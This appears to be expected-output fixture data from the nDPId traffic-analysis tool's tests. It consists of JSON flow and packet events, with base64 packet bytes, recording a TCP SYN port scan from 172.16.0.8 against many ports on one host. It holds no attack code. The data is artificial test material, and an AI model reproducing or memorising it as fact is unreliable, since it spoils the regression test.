-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAskrwAAC8GhrasEAAIQA2GNIzTC8XdU4MZAAAAAGACEAAcxwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsiUkAADMGjCmsEAAIQA2GNIzTwAjdU4MZAAAAAGACEABogwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsOr4AADkG1LSsEAAIQA2GNIzTHvDdU4MZAAAAAGACCAARnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLsAADEG8resEAAIQA2GNIzTAq\/dU4MZAAAAAGACCAAt3QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxiMAACoGWE+sEAAIQA2GNIzTDSzdU4MZAAAAAGACDAAfYAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsI\/AAACUG\/4KsEAAIQA2GNIzTAYXdU4MZAAAAAGACCAAvBwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAswtYAADYGT5ysEAAIQA2GNIzTgAfdU4MZAAAAAGACDACshAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsWhoAACcGx1isEAAIQA2GNIzTD6HdU4MZAAAAAGACEAAY6wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsS5QAAC8Gzd6sEAAIQA2GNIzTBwndU4MZAAAAAGACEAAhgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsHecAADsG74usEAAIQA2GNIzTCi\/dU4MZAAAAAGACEAAeXQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZwAADUGxdasEAAIQA2GNIzTFi7dU4MZAAAAAGACCAAaXgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsKBoAADoG5lisEAAIQA2GNIzTDmndU4MZAAAAAGACDAAeIwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADMGT5ysEAAIQA2GNIzTC2jdU4MZAAAAAGACEAAdJAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsPDwAACgG5DasEAAIQA2GNIzSJxzdUoMYAAAAAGACBAANcwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsPEQAADsG0S6sEAAIQA2GNIzSA\/3dUoMYAAAAAGACEAAkkgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7EAACcGlcGsEAAIQA2GNIzS6nTdUoMYAAAAAGACEAA+GgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGYAADIGigysEAAIQA2GNIzSE4bdUoMYAAAAAGACDAAZCQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsgZEAADgGjuGsEAAIQA2GNIzSE4rdUoMYAAAAAGACBAAhBQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsWyIAAC8GvlCsEAAIQA2GNIzSBETdUoMYAAAAAGACEAAkSwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsZykAADkGqEmsEAAIQA2GNIzSCDfdUoMYAAAAAGACCAAoWAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+4AADMGFYSsEAAIQA2GNIzSBBndUoMYAAAAAGACEAAkdgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADAGUpysEAAIQA2GNIzSImDdUoMYAAAAAGACBAASLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsGjIAADgG9kCsEAAIQA2GNIzSJErdUoMYAAAAAGACBAAQRQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscfUAADIGpH2sEAAIQA2GNIzSwADdUoMYAAAAAGACDABsjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
